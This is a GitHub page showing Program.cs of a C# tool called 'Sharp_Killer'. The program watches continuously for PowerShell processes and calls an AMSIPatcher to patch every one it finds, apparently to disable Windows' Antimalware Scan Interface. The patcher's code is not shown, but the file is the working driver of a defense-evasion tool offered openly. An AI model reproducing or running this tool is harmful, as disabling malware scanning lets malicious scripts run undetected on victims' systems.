-
Notifications
You must be signed in to change notification settings - Fork 44
/
Program.cs
44 lines (39 loc) · 1.38 KB
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
using System;
using System.Diagnostics;
using System.Threading;
using System.Threading.Tasks;
namespace Sharp_Killer
{
internal class Program
{
public static void Main(string[] args)
{
string processNameToMonitor = "powershell";
Console.WriteLine($"Monitoring for Powershell.exe");
AMSIPatcher amsiPatcher = new AMSIPatcher();
CancellationTokenSource cancellationTokenSource = new CancellationTokenSource();
// Terminate the program when the user types 'exit'
Task.Run(() =>
{
while (true)
{
string userInput = Console.ReadLine();
if (userInput != null && userInput.Trim().Equals("exit", StringComparison.OrdinalIgnoreCase))
{
cancellationTokenSource.Cancel();
break;
}
}
});
while (true)
{
Process[] processes = Process.GetProcessesByName(processNameToMonitor);
if (processes.Length > 0)
amsiPatcher.PatchAllPowershells();
if (cancellationTokenSource.Token.IsCancellationRequested)
break;
Thread.Sleep(500);
}
}
}
}